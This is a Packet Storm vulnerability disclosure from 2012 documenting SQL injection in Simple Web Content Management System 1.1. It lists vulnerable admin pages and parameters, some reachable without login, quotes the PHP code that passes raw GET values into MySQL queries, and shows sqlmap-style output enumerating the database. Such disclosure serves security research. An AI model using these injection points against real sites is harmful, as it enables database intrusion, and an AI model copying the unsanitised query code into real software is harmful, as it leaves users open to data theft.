Simple Web Content Management System 1.1 SQL Injection

2012-06-01T00:00:00
ID PACKETSTORM:113179
Type packetstorm
Reporter loneferret
Modified 2012-06-01T00:00:00

Description

                                        
                                            `######################################################################################  
# Exploit Title: Simple Web Content Management System SQL Injection  
# Date: May 30th 2012  
# Author: loneferret  
# Version: 1.1  
# Application Url: http://www.cms-center.com/  
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23  
######################################################################################  
# Discovered by: loneferret  
######################################################################################  
  
# Side note:  
# This application is nothing fancy, and really shouldn't be used other than  
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable  
# parameter.  
  
# Vulnerability:  
# Due to improper input sanitization, many parameters are prone to SQL injection.  
# Most of them require to be authenticated with an account (admin).  
# But there are a few pages that will cause an error without having to logon.  
  
  
# PoC 1:  
# No Authentication Required.  
# Page: /admin/item_delete.php?id=[SQLi]  
# Vulnerable Parameter: id  
# Code:  
15 $id = $_GET['id'];  
16 $title = NULL;  
17 $text = NULL;  
18 database_connect();  
19 $query = "select title,text from content where id = $id;";  
20 //echo $query;  
21 $result = mysql_query($query);  
  
# As stated, nothing is checked before passing "id" to MySql.  
# This results in a MySql error.  
  
  
  
# PoC 2:  
# No Authentication Required.  
# Page: /admin/item_status.php?id=[SQLi]&status=1  
# Page: /admin/item_status.php?id=1&status=[SQLi]  
# Vulnerable Parameter: id & status  
# Code:  
10 $ref = $_GET['ref'];  
11 $id = $_GET['id'];  
12 $status = $_GET['status'];  
13 $update = "UPDATE content  
14 SET status='$status'  
15 WHERE id='$id'";  
16 $query = mysql_query($update)  
or die("Their was a problem updating the status: ". mysql_error());  
  
# As stated, nothing is checked before passing "id" and/or "status" to MySql.  
# This results in a MySql error.  
  
  
  
# PoC 3:  
# Authentication Required.  
# Page: /admin/item_detail.php?id=[SQLi]  
# Vulnerable Parameter: id  
# Code:  
15 $id = $_GET['id'];  
16 $title = NULL;  
17 $text = NULL;  
18 database_connect();  
19 $query = "select title,text from content where id = $id;";  
20 //echo $query;  
21 $result = mysql_query($query);  
  
# As stated, nothing is checked before passing "id" to MySql.  
# This results in a MySql error.  
  
  
# PoC 4:  
# Authentication Required.  
# Page: /admin/item_modify.php?id=[SQLi]  
# Vulnerable Parameter: id  
# Code:  
60 database_connect();   
61 if(isset($_GET['id'])) {  
62 $id = ($_GET['id']);  
63 }  
64 $select = "SELECT *  
65 FROM content  
66 where id = '$id'";  
67 $query = mysql_query($select);  
  
# As stated, nothing is checked before passing "id" to MySql.  
# This results in a MySql error.  
  
# PoC 6:  
# Authencitation Required.  
# Page: /admin/item_position.php?id=[SQLi]&mode=up  
# Vulnerable Parameter: id  
.  
...ok I think we get the idea now.  
.  
.  
#   
# Example output:  
#  
[19:40:22] [INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL 5.0  
[19:40:22] [INFO] fetching tables for database: phpcms  
[19:40:22] [INFO] heuristics detected web page charset 'ascii'  
[19:40:22] [INFO] the SQL query used returns 1 entries  
[19:40:22] [INFO] retrieved: content  
Database: phpcms  
[1 table]  
+---------+  
| content |  
+---------+  
  
`